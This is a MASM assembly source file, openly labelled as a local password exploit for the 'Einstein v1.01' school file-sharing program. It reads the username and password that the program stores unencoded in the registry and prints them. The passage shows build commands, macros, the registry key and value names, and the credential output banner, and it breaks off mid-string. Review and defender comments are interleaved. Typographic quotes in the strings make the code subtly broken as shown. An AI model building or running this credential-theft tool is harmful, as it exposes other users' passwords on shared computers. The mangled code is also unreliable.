1 ; Nothing special, other than that the program doesn't encode the user/pass in the registry.
2 ; Einstein v1.01 - http://www.Bfriendly.com some crappy school file sharing program
3 ; made because i think C is overkill for these types of local exploits,
4 ; shit we can do this in vbs/bat too if ya want
5 ;Compiles in Masm
6 ;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
7 ;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj
8
9 .386
10 .model flat, stdcall
11 option casemap :none
12 include \masm32\include\windows.inc
13 include \masm32\include\user32.inc
14 include \masm32\include\kernel32.inc
15 include \masm32\include\shell32.inc
16 include \masm32\include\advapi32.inc
17 include \masm32\include\masm32.inc
18 includelib \masm32\lib\user32.lib
19 includelib \masm32\lib\kernel32.lib
20 includelib \masm32\lib\shell32.lib
21 includelib \masm32\lib\advapi32.lib
22 includelib \masm32\lib\masm32.lib
; literal: macro function that stores its argument text as a NUL-terminated
; byte string in the data section and expands to the label of that string.
;   quoted_text - VARARG; placed verbatim as the operand list of a db directive,
;                 followed by a terminating 0 byte.
; The macro switches to .data to emit the string and then unconditionally
; switches to .code, so the assembler is left in the code section after every
; expansion, whatever section was active at the point of use.
23 literal MACRO quoted_text:VARARG
24 LOCAL local_text                     ; label local to each expansion
25 .data
26 local_text db quoted_text,0          ; the string plus its NUL terminator
27 .code                                ; always returns to the code section
28 EXITM <local_text>                   ; expansion result is the string's label
29 ENDM
; SADD: macro function that expands to "ADDR <label>", where <label> is the
; string label produced by literal(quoted_text).
;   quoted_text - VARARG; passed through unchanged to literal().
; ADDR is an INVOKE operand operator, so the expansion is presumably meant to
; be written in place of an INVOKE argument - the call sites are outside this view.
30 SADD MACRO quoted_text:VARARG
31 EXITM <ADDR literal(quoted_text)>
32 ENDM
; NUL-terminated constant strings used by the program. The file's header
; comment says the target application keeps the user/pass unencoded in the
; registry; the code that consumes these strings lies outside this view.
; Defender note: secrets stored as plain registry strings can be read by any
; process permitted to read the key. An application should protect stored
; credentials (for example with Windows DPAPI) and restrict the key's ACL.
33 .data
; NOTE(review): MASM string literals have no escape sequences, so this string
; holds two backslash characters between "Software" and "einstein" - confirm
; that the consumer of SubKey expects that.
; The registry hive it is opened under is not visible in this view.
34 SubKey db "Software\\einstein",0
; Presumably the registry value names that hold the stored credentials -
; verify against the code that reads them.
35 szUser db "username",0
36 szPass db "password",0
; Message text for the case where the product is not installed; where it is
; displayed is not visible in this view.
37 noExeem db "Einstein v1.01 is not installed on your pc!",0
38 Theoutput db ’_______________________________________________________________’,13,10
39 db ’* Einstein v1.01 Local Pass Exploit *’,13,10
40 db ’* Based On Kozans code in C *’,13,10
41 db ’* by illwill − xillwillx@yahoo.com *’,13,10
42 db ’*_____________________________________________________________*’,13,10
43 db ’ UserName: %s ’,13,10
44 db ’ Password: %s